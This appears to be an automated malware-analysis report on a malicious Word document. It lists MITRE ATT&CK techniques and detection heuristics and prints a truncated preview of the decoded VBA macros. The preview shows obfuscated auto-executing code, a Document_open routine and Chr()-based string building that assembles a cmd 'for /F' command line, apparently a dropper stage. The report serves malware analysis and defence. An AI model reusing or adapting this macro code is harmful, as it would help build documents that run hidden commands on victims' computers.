MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and utilizes a 'Shell()' call, indicating an attempt to execute arbitrary code. The VBA script is obfuscated but its presence and the 'Shell()' call strongly suggest it's designed to download and execute a secondary payload.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26848 bytes |
SHA-256: ab8235a274d3dd95ab7f0c2e22c51088d963890ecbdf15d69fe69acbe5a7af4b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vHqTdVZJbLoAjp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wApAlzP()
ismzlw = (rJwknV + vahzU) * (vSGEZ / 40132)
sVEhR = (rSmww + wlSzT) * (DbpcWB / 41882)
HhLtLc = (tqMHo + FAWfU) * (wOXCSG / 22268)
QzCLE = (jkaEnp + rbkLCl) * (oGrhh / 28421)
HVdpD = (FhRnDj + kaPRw) * (YKQAi / 89677)
End Function
Function mhZQRSjo()
IUZVdQ = (ijcchl + RzclG) * (PJDNL / 67000)
jWKNIt = (oHLrrn + UIzrVv) * (wJsvkO / 73844)
AmwWOd = (wIGmG + dVuuww) * (SsSXA / 71032)
SYiJZ = (KEuRM + uDiOJo) * (jWBpQ / 80280)
QiOTTj = (kVvjZ + YzmjHQ) * (FBNij / 82796)
End Function
Private Sub Document_open()
On Error Resume Next
pVsit = roQBOf / tvMAi * FnFrTt / mOMkq - (tEcaFa + hTOTNw * (WjLGun * nTkdZp / 81584 - dcfLc))
ZjMGVT = Eqvzb / iJOPw * iJZvSY / WtEGwX - (wkaOP + ojcpc * (zbjhiY * jPRzo / 88672 - qwKAkw))
QVHaC = mZmiU / fCCFq * pFksw / lpUpln - (WqGSq + UklBuz * (EYKKbW * HnhjXY / 51528 - Nrznwb))
JduUh = (83861 * KnSNV / 40642 * 7601) - 7584 + jKGLB / 27876 + RwScvq
zhihJ = iSANZE / mourwN * KbQZwV / RYrjZ - (DjUAff + EGVMr * (kjPOuK * srXREl / 77970 - NtIiAG))
UuMTM = (65083 * FDiQk / 59729 * 4675) - 19296 + YoFMIC / 92565 + qRrMNi
IwNvEJPP = Application.Run("JORbzhnA", "" + ujzziGwjk + ZEnLVizrqhklU + CVar("c") + sYcFfCiMowj + aRkPWDJlJw + mrCGztEznhv + uhlQOMi + ZsjtJYT + CfljRIA + PPaQwRAJS + fijfGZ + Dzorcr + rjiiSVfqEt + NUhnwEOHkE + libNraMTNmN + UwVrFRJGI + YXnnJW + rqbBHpPjOu + paYmNjcCbfYuj)
NwiZa = (90249 * MjMqi / 52775 * 99170) - 60082 + jfiri / 99597 + ubUirn
PPiUw = (50665 * iicCDt / 90614 * 48548) - 94457 + pGbXt / 79465 + JOptMR
dTARk = (51095 * PzwtKK / 56461 * 67460) - 13651 + hRFaB / 97383 + awKhk
End Sub
Function zijNcDIMuVl()
iKdznd = (86728 * JTLdZ / 63804 * 76193) - 10389 + aGWTbR / 23626 + HnNXDT
XXWuad = (5083 * GnNVo / 95882 * 10797) - 32475 + YPRLf / 94039 + RucWW
MzhNTD = (19334 * vlKls / 1846 * 82132) - 6985 + DCZiM / 6257 + RHjqfk
OiKEz = (14366 * Nmsisr / 36740 * 83835) - 76236 + DviwV / 51381 + raDdf
End Function
Attribute VB_Name = "rNhFrjWwKYp"
Function mrCGztEznhv()
On Error Resume Next
YTCBtk = 15499 * BmnCkq / 21478 / 6036
oUodBf = (RfzwiE - zVMOkW * 4781 - KlFfo) / 6828 + micXjq - 63964 - vSWacE
cLZFmjs = CStr(Chr(rarjqniORNl + DiqVnMG + 109 + oLnpMvCUD + wGHvRGX)) + "d /" + CStr(Chr(NmZSpoPXR + EQcljvBa + 99 + zJtcDzbu + pfwBClUzYjfC)) + " ^fo" + "r , /" + "F " + ";" + " " + CStr(Chr(BiiVPVFwoBQd + mrncNlUYSajvb + 34 + GjuXKaV + fibsqwkZ)) + " " + " to" + "ke"
iuCOi = (SBhhKD - VqWmt * 34110 - KUCSj) / 32599 + NvaCBw - 72784 - uBQIlK
JXmXz = (EpKqTI - rkiNz * 9635 - GiIHl) / 45171 + VWljLo - 34695 - vttzhr
LcdkCQ = (vlFQwi - flZji * 34856 - KIUvw) / 78215 + TAXOVm - 94139 - InuEoq
khVfsOqNRw = "n" + "s= " + " +4" + " " + " "
WOjOH = (zITSA - IoDct * 52523 - hCasRA) / 55814 + pddjQD - 93248 - kIZMb
BUwKz = (qcvOIY - vWOOi * 75116 - fqikQ) / 23790 + TUTOK - 15113 - YXVpdn
hUHia = (OtLhoR - LlLunj * 43970 - bzwQZ) / 42745 + sYBzJi - 16004 - cllkF
mdQKU = "deli" + CStr(Chr(NjsCpAOdQDl + DuiVWFVPQYhziJ + 109 + WqKqwoVOdEXw + PVKoYwI)) + "s" + "=l" + "i5N" + "Z" + CStr(Chr(UjOwILFLq + uNbiwOYUrRhYSM + 34 + mqlcZvbq + sNDYshKCKCtj)) + " ; " + "%^"
WqWNmJ = (pEcsGU - OBIQA * 74748 - oHvDXj) / 16404 + wRhTS - 55160 - CILjd
YTpCMqzR = "2" + " , " + "^" + "iN " + " ; " + ", " + "( , ' " + "; ^^A" + "SSo"
mrCGztEznhv = cLZFmjs + khVfsOqNRw + mdQKU + YTpCMqzR
lBtTWk = (oaVAhi - JPamnF * 20081 - nBjpw) / 98213 + RJUta - 20053 - dPlRV
zSvrc = (wIqYpW - Ornhld * 69518 - MfnIQ) / 16016 + LBVjhD - 80616 - kzWzIJ
End Function
Function uhlQOMi()
On Error Resume Next
Dkmmb = (jsszl - HiLqKw * 79622 - GpWYI) / 5430 + Odbzti - 70140 - fVzjz
pEEwdO = (JwMdu - ONOdYT * 35043 - RzsEW) / 58691 + VKNrMP - 358 - UMZVD
mFmCh = "^" + "^C ; ;" + "
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.